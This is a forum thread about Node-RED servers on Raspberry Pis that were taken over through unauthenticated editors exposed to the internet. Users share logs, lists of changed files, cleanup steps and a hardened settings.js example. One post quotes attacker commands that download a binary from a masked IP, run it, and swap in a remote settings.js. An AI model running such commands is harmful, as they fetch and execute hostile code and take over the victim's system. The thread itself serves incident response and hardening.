Dashboard suddenly asks for password (Hacked Node-RED servers)

Show us how you have commented it out and what the error is.

Have a look in /var/log/syslog and see if anything is logged there at 12:45.

Do you mean it was accessible without any protection? If so then almost certainly you have been hacked.

Could this have to do with it?
These files were last changed at the time the problem appeared.

Check out the post above by @bakman2. You have most likely been hacked.

Just got back home and disabled all port forwards that were enabled on the router.
The pi was accessible to the outside world, but you do need a password to log into the pi.
But not to access Node-RED.
I will check the logs in a few.

16 Oct 18:26:58 - [info] Node-RED version: v2.1.3
16 Oct 18:26:58 - [info] Node.js version: v12.18.0
16 Oct 18:26:58 - [info] Linux 4.19.118-v7l+ arm LE
16 Oct 18:26:59 - [info] Loading palette nodes
Missing ENV var CONFIG_PATH
16 Oct 18:27:01 - [info] Dashboard version 3.1.2 started at /ui
16 Oct 18:27:01 - [info] Settings file : /home/pi/.node-red/settings.js
16 Oct 18:27:01 - [info] Context store : 'default' [module=memory]
16 Oct 18:27:01 - [info] User directory : /home/pi/.node-red
16 Oct 18:27:01 - [warn] Projects disabled : editorTheme.projects.enabled=false
16 Oct 18:27:01 - [info] Flows file : /home/pi/.node-red/flows.json
16 Oct 18:27:01 - [info] Creating new flow file
16 Oct 18:27:01 - [warn]

Your flow credentials file is encrypted using a system-generated key.
If the system-generated key is lost for any reason, your credentials
file will not be recoverable, you will have to delete it and re-enter
your credentials.
You should set your own key using the 'credentialSecret' option in
your settings file. Node-RED will then re-encrypt your credentials
file using your chosen key the next time you deploy a change.

16 Oct 18:27:01 - [info] Server now running at http://127.0.0.1:1880/
16 Oct 18:27:01 - [info] Starting flows
16 Oct 18:27:01 - [info] Started flows

After I commented the stuff out

Now here is the log file

pi@raspberrypi:~/.node-red $ node-red-log

16 Oct 18:27:01 - [info] Server now running at http://127.0.0.1:1880/
16 Oct 18:27:01 - [info] Starting flows
16 Oct 18:27:01 - [info] Started flows
Stopping Node-RED graphical event wiring tool...
16 Oct 19:29:30 - [info] Stopping flows
16 Oct 19:29:30 - [info] Stopped flows
nodered.service: Succeeded.
Stopped Node-RED graphical event wiring tool.
Started Node-RED graphical event wiring tool.
Error loading settings file: /home/pi/.node-red/settings.js
/home/pi/.node-red/settings.js:92
},;
^
SyntaxError: Unexpected token ';'
at wrapSafe (internal/modules/cjs/loader.js:1054:16)
at Module._compile (internal/modules/cjs/loader.js:1102:27)
at Object.Module._extensions..js (internal/modules/cjs/loader.js:1158:10)
at Module.load (internal/modules/cjs/loader.js:986:32)
at Function.Module._load (internal/modules/cjs/loader.js:879:14)
at Module.require (internal/modules/cjs/loader.js:1026:19)
at require (internal/modules/cjs/helpers.js:72:18)
at Object. (/usr/lib/node_modules/node-red/red.js:136:20)
at Module._compile (internal/modules/cjs/loader.js:1138:30)
at Object.Module._extensions..js (internal/modules/cjs/loader.js:1158:10)
nodered.service: Succeeded.

Sorry, I'm doing this off of my phone, it's taking much longer.

If you didn't need a password to open node-red then I think there is no doubt that you have been hacked. I suggest you erase the SD card and start again. The logs are no longer relevant.

If you have any other machines on the system that were accessible from the pi without entering a password then I think you should think seriously about whether other machines may have also been compromised.


Indeed it seems to be.
When I look into the syslog it all went fast, in about 5 seconds.
Anyway, I closed all the ports that gave access to the system from the internet.
The Node-RED JSON files seem to be OK. I migrated them to another instance of Node-RED, with another port.
I also deleted the xterm files in the modules folder. They were installed at the time of the hack.

As others have suggested - at this point I would assume other parts of your machine have been compromised - and that it would be unsafe to continue to use it without completely wiping the SD card and starting again.

Hi all, got the same issue yesterday. I checked the settings.js file and it was edited at 23:34;
authentication was uncommented.

When I check the terminal I see three lines I didn't add.

" apt update -y; apt install curl cron nano -y; service cron start; uname -a"
"cd /tmp; curl -o php http://XX.XX.XX.XX/a-r.m-6.ISIS; chmod +x php; ./php; rm -rf php"
"d ~/.node-red; mv settings.js test.js; curl -o settings.js http://XX.XX.XX.XX/nodered.txt; node-red-restart"

Any suggestions what they wanted to do? And how to undo this?

Thank you all so much. I replaced my settings.js file with one from an instance of Node-RED that was working,
and also deleted the xterm folders. I see that it added a terminal window in Node-RED near the drop-down where you find Dashboard.
I will now have to secure my Node-RED or set up a VPN, and it's also probably a good idea to wipe and start over.
Thanks all so much again, greatly appreciated.

Nice understatement.

@Steven1 has posted evidence of the hack downloading a program from a server in Russia and executing it.
Whatever that does, it's surely not confined to Node-red.

So if your Node-red machine was attacked and is ARM based it is thoroughly compromised.
It's a safe bet the attack will have attempted to access other computers on your network.

You could just hope that you don't have ransomware on your devices, and that you are not now part of a botnet...

Same issue here!

I found the following files changed on Oct 16 21:26:

.config.json
settings.js
package.json
package-lock.json

node_modules/
node-red-contrib-xterm
npmlog
number-is-nan
prebuild-install
set-blocking
simple-concat
simple-get
string-width
strip-ansi
tar-fs
xterm
wide-align
xterm-addon-fit

So:
I restored .config.json and settings.js from an older backup.
I deleted the xterm folders from node_modules
I removed all xterm lines from package.json and package-lock.json.

And after rebooting my node-red works again.

Still wondering HOW this could happen, since I use non-standard usernames and passwords everywhere and I use personal certificates for SSH.

Did you have any ports open to the internet?

  • Are you using node-red basic auth?
    • i.e. did your node-red require a username and password BEFORE this happened?
  • Do you have firewall rules to restrict access?
  • Do you run node-red as root or sudo or a user with admin/sudo capability?

Do you mean you have opened node-red to the internet again, not using https and without setting user and passwords for access, but with a non-standard port? If so then that is not sufficient. Never open your machine via any port unless you are using https with good passwords.
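For reference, this is what the settings.js of a Node-RED instance that follows the advice above looks like. It is an added example, not the poster's file and not the stock settings.js shipped with Node-RED; the certificate paths, the username and the environment variable are assumptions, and the password hashes are placeholders to be replaced with the output of `node-red admin hash-pw`.

```javascript
// Added example of a hardened Node-RED settings.js (not the poster's file, not the
// stock settings.js). Paths, usernames and the env var are assumptions; the bcrypt
// hashes are placeholders to be generated with `node-red admin hash-pw`.
const fs = require('fs');

module.exports = {
    // Listen on localhost only; reach the editor through a VPN, an SSH tunnel or a
    // TLS reverse proxy instead of a router port forward. (Default is 0.0.0.0.)
    uiHost: "127.0.0.1",
    uiPort: process.env.PORT || 1880,

    // Weak (what the compromised installs had): the whole adminAuth block commented
    // out, so anyone who could reach port 1880 got the editor, could install nodes
    // and could edit settings without a password.
    // adminAuth: { ... },

    // Hardened: editor login with a bcrypt hash (never the plain password).
    adminAuth: {
        type: "credentials",
        users: [{
            username: "admin",
            password: "$2b$08$REPLACE_WITH_OUTPUT_OF_node-red_admin_hash-pw", // placeholder
            permissions: "*"
        }]
    },

    // The dashboard at /ui and HTTP-in nodes get their own credentials.
    httpNodeAuth: {
        user: "dashboard",
        pass: "$2b$08$REPLACE_WITH_OUTPUT_OF_node-red_admin_hash-pw" // placeholder
    },

    // TLS. Given as a function so the files are read when Node-RED starts, not when
    // this file is required. Paths are assumptions.
    https: function () {
        return {
            key: fs.readFileSync('/home/pi/.node-red/certs/privkey.pem'),
            cert: fs.readFileSync('/home/pi/.node-red/certs/fullchain.pem')
        };
    },
    requireHttps: true,

    // Set your own credentialSecret so the flow credentials file survives a
    // settings.js replacement (the startup log above warns about the
    // system-generated key). Assumed to come from an environment variable.
    credentialSecret: process.env.NODE_RED_CREDENTIAL_SECRET,

    functionGlobalContext: {},
};
```

Setting `uiHost` to 127.0.0.1 and `adminAuth` together means the editor is unreachable from the LAN or the internet unless you deliberately expose it, and then only with a password; the `https` block and `requireHttps` make sure that password is never sent in clear text when you do.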

Yeah, but AFAIK those are needed for Node-RED Google Assistant Bridge and Node-RED Smart Home Control.

Unfortunately not :=((
But you can't enter a shell or change the settings/config from the UI, can you?

Yes I use a firewall, but what firewall rules do you mean and restrict on what?

Runs as "pi", and pi has a non-default password.